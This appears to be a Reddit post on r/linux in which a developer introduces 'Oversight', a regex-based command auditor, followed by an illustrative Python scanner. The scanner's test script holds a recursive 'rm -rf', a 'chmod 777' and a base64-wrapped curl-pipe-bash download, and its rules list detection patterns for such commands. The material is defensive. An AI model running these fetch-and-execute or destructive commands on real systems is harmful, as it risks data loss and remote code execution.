Getting schooled by my own security tool

Posted by ClassroomHaunting333@reddit | linux | 10 comments

I was cleaning my system last night, running sudo rm -rf /var/cache/pacman/pkg/download-* to clear up some space after a failed AUR package install.

I was so frustrated and tired of the situation I was in that I completely forgot I had my own security auditor, Oversight, running in the background. It jumped in and blocked the command. It was quite a surprise to see it working.

I have spent so much time crafting the regex rules for system integrity that I managed to catch myself off guard executing a no-way-back command. It is one thing to test a security tool against dummy files, but having it stop me from nuking my own directory when I was focused on something else felt like a real success.

It is the first time I am sharing this project. It is a distro-agnostic auditor designed to scan scripts and commands before they run.

A couple of days ago I pushed v0.3.5, which moves the logic to an external JSON rules engine and adds multi-line context awareness, so it shows you exactly which lines of code are risky before you hit enter. At the moment it can scan locally and from GitHub, Gist, or any raw URL.

I am moving into Phase 2 now. The plan is to integrate the OSV.dev API so it can flag known vulnerabilities in package versions, plus add basic de-obfuscation for base64 payloads to see what is hidden in those curl pipe bash commands.

It feels like the project is starting to hold its own. Has anyone else experienced that weird satisfaction of being blocked by their own code?

If you are interested, you can check Oversight here: https://github.com/Rakosn1cek/oversight

Any feedback is welcome.
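As an added illustration of the kind of scanner the post describes, here is a small Python example written for this page (it is not Oversight's code and does not use its rule format). It loads regex rules from a JSON document, joins backslash-continued lines so a command split across physical lines is judged as one unit, reports each hit with its line span and one line of context either side, and, on lines that call base64 -d, decodes base64-looking tokens and runs the same rules over the decoded text so a wrapped curl-pipe-bash is caught too. The rule ids, patterns, the should_block gate and the sample script are all constructed assumptions for the example.

```python
import base64
import json
import re

# Constructed rule set in the spirit of an external JSON rules engine. This is an added
# example, not Oversight's rule format or code; rule ids and patterns are assumptions.
RULES_JSON = r'''
[
  {"id": "rm-recursive-abs", "severity": "high",
   "pattern": "\\brm\\s+(-\\w+\\s+)*-\\w*r\\w*\\s+(-\\w+\\s+)*/\\S*",
   "message": "recursive rm on an absolute path"},
  {"id": "curl-pipe-shell", "severity": "high",
   "pattern": "\\b(curl|wget)\\b[^|]*\\|\\s*(sudo\\s+)?(ba|z|da)?sh\\b",
   "message": "download piped straight into a shell"},
  {"id": "base64-pipe-shell", "severity": "high",
   "pattern": "base64\\s+(-d|--decode)\\b[^|]*\\|\\s*(sudo\\s+)?(ba|z|da)?sh\\b",
   "message": "base64-decoded payload piped into a shell"},
  {"id": "chmod-world-writable", "severity": "medium",
   "pattern": "\\bchmod\\s+(-R\\s+)?[0-7]?777\\b",
   "message": "world-writable permissions"}
]
'''

B64_DECODE_CALL = re.compile(r"base64\s+(-d|--decode)\b")
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")


def load_rules(rules_json):
    """Parse the JSON rule list and pre-compile each pattern."""
    rules = json.loads(rules_json)
    for rule in rules:
        rule["regex"] = re.compile(rule["pattern"])
    return rules


def logical_lines(text):
    """Join backslash-continued lines so a command split across physical lines is
    matched as one unit. Yields (start_line, end_line, joined_command), 1-based."""
    buf, start = [], None
    for n, raw in enumerate(text.splitlines(), 1):
        if start is None:
            start = n
        if raw.rstrip().endswith("\\"):
            buf.append(raw.rstrip()[:-1])
            continue
        buf.append(raw)
        yield start, n, " ".join(buf)
        buf, start = [], None
    if buf:  # file ended on a continuation line
        yield start, n, " ".join(buf)


def decode_payloads(command):
    """Best-effort base64 de-obfuscation: only on lines that call `base64 -d`,
    decode every base64-looking token that yields printable UTF-8 text."""
    if not B64_DECODE_CALL.search(command):
        return []
    decoded = []
    for m in B64_TOKEN.finditer(command):
        token = m.group(0)
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
            text = raw.decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            decoded.append(text)
    return decoded


def scan(text, rules=None):
    """Run every rule over each logical line and over any decoded base64 payload in it.
    Each finding carries the physical line span and one line of context either side."""
    rules = rules if rules is not None else load_rules(RULES_JSON)
    physical = text.splitlines()
    findings = []
    for start, end, command in logical_lines(text):
        bodies = [("command", command)]
        bodies += [("decoded payload", p) for p in decode_payloads(command)]
        for source, body in bodies:
            for rule in rules:
                if rule["regex"].search(body):
                    findings.append({
                        "rule": rule["id"], "severity": rule["severity"],
                        "message": rule["message"], "source": source,
                        "lines": (start, end),
                        "context": physical[max(0, start - 2):end + 1],
                    })
    return findings


def should_block(command, rules=None):
    """Gate for a pre-exec hook: refuse to run anything with a high-severity finding."""
    return any(f["severity"] == "high" for f in scan(command, rules))


# Constructed sample script (not a real install script) exercising each rule, including
# a command split across two lines and a base64-wrapped curl|bash.
PAYLOAD = "curl -fsSL http://example.invalid/install.sh | bash"
SAMPLE_SCRIPT = "\n".join([
    "#!/bin/sh",
    "set -e",
    'echo "cleaning up"',
    "sudo rm -rf \\",
    "  /var/cache/pacman/pkg/download-*",
    "chmod 777 /tmp/build",
    "echo " + base64.b64encode(PAYLOAD.encode()).decode() + " | base64 -d | sh",
])

if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT):
        print(f"[{f['severity']}] {f['rule']} lines {f['lines'][0]}-{f['lines'][1]} "
              f"({f['source']}): {f['message']}")
        for line in f["context"]:
            print("    | " + line)
    print("block:", should_block("sudo rm -rf /var/cache/pacman/pkg/download-*"))
```

Two caveats worth keeping in mind with any regex-based pre-exec check: the rules see only the literal text, so rm -rf "$dir" with the path expanded at run time, or a payload split across several base64 fragments, passes straight through; and the base64 decoding here is deliberately gated on a visible base64 -d call to avoid decoding every long word in a script, which means a payload decoded by some other tool (python -c, openssl enc) is not unwrapped.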